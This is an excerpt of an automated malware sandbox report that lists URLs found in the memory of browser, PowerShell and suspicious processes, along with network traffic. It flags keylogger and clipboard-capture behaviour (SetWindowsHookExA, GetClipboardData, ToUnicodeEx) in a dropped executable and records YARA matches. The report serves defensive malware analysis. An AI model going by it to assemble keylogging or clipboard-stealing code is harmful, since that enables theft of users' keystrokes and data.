Source: chrome.exe, 0000000C.00000003.1502669991.00007814028F9000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1509659765.0000781402903000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
Source: chrome.exe, 0000000C.00000002.1538028783.0000781402380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000000C.00000003.1429071252.00003328000D0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1429125248.00003328000DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000000C.00000002.1538028783.0000781402380000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1542506053.0000781402C04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1537991710.0000781402370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000000C.00000002.1538718604.0000781402518000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.googleusercontent.com/crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5
Source: chrome.exe, 0000000C.00000002.1538718604.0000781402518000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.googleusercontent.com/crx/blobs/Ad_brx3PMR7YziqUHWUd9Aoisl-XiA2mVhBxonBR7vVg9-aWDJe
Source: chrome.exe, 0000000C.00000003.1502669991.00007814028F9000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1509659765.0000781402903000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000007.00000002.1407475792.000001CD7170A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.1407475792.000001CD7170A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.1407475792.000001CD7170A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://dl.google.com/update2/installers/icons/%7B8a69d345-d564-463c-aff1-a69d9e530f96%7D.bmp?lang=e
Source: chrome.exe, 0000000C.00000002.1539453809.0000781402604000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.
Source: chrome.exe, 0000000C.00000002.1552718464.0000781403CC4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.co
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
Source: chrome.exe, 0000000C.00000002.1546816283.000078140323C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 0000000C.00000002.1539453809.0000781402604000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 0000000C.00000002.1539453809.0000781402604000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 0000000C.00000002.1539453809.0000781402604000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 0000000C.00000002.1539453809.0000781402604000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 0000000C.00000002.1539453809.0000781402604000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 0000000C.00000002.1546816283.000078140323C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 0000000C.00000003.1502271559.0000781403634000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1548612242.00007814035C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 0000000C.00000002.1548612242.00007814035C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv10
Source: chrome.exe, 0000000C.00000002.1548612242.00007814035C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: chrome.exe, 0000000C.00000002.1545496925.000078140301C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: chrome.exe, 0000000C.00000003.1502271559.0000781403634000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=searchTerms
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/glic/intro?20
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/glic2
Source: powershell.exe, 00000007.00000002.1385587555.000001CD62ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: chrome.exe, 0000000C.00000003.1445241830.0000781000478000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1436930679.000078100017C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1437518542.0000781000188000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000000C.00000003.1445241830.0000781000478000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/fK
Source: chrome.exe, 0000000C.00000003.1445241830.0000781000478000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1436930679.000078100017C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1437518542.0000781000188000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000000C.00000003.1445241830.0000781000478000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000000C.00000003.1445241830.0000781000478000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 0000000C.00000003.1445241830.0000781000478000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 0000000C.00000003.1449293667.00007810004CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 0000000C.00000003.1436930679.000078100017C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1437518542.0000781000188000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 0000000C.00000003.1503843344.0000781403B5C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 0000000C.00000003.1437518542.0000781000188000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 0000000C.00000002.1534988241.000078100007C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 0000000C.00000003.1436930679.000078100017C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1437518542.0000781000188000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 0000000C.00000003.1436930679.000078100017C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1437518542.0000781000188000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 0000000C.00000002.1534988241.000078100007C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardx
Source: chrome.exe, 0000000C.00000003.1437518542.0000781000188000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 0000000C.00000003.1449293667.00007810004CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 0000000C.00000003.1437518542.0000781000188000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: wscript.exe, 00000000.00000002.1451497783.0000014FC47A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: recover.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: chrome.exe, 0000000C.00000002.1546816283.000078140323C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: powershell.exe, 00000007.00000002.1407475792.000001CD715D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1385587555.000001CD63048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1407475792.000001CD7170A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: chrome.exe, 0000000C.00000003.1518004176.0000781402498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1518061236.000078140249C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
Source: powershell.exe, 00000007.00000002.1385587555.000001CD62B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000007.00000002.1385587555.000001CD62B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://passwords.google.comSaved
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://policies.google.com/
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: chrome.exe, 0000000C.00000002.1538606862.00007814024EC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 0000000C.00000002.1537031527.000078140227C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 0000000C.00000002.1548000258.0000781403458000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=incognito
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://support.google.com/chrome/a/?p=browser_profile_details
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/96817
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: msedge.exe, 00000013.00000002.1631923646.0000450C000E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: chrome.exe, 0000000C.00000002.1545341973.0000781402FC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1548612242.00007814035C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1545496925.000078140301C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v10
Source: chrome.exe, 0000000C.00000003.1502271559.0000781403634000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1545341973.0000781402FC8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 0000000C.00000003.1502271559.0000781403634000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=searchTerms
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2521817083.00000000030F0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000F.00000002.1449845530.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000000C.00000002.1539091711.0000781402588000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: recover.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged
Source: chrome.exe, 0000000C.00000002.1537956378.0000781402364000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1548612242.00007814035C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,00000000

11_2_00409D1E

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0040B158

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	11_2_0041696E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	13_2_00409E39
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	13_2_00409EA1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	14_2_00406DFC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	14_2_00406E9F
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	15_2_004068B5
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	15_2_004072B5

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0040B158

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

11_2_00409E4A

Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack, type: UNPACKEDPE
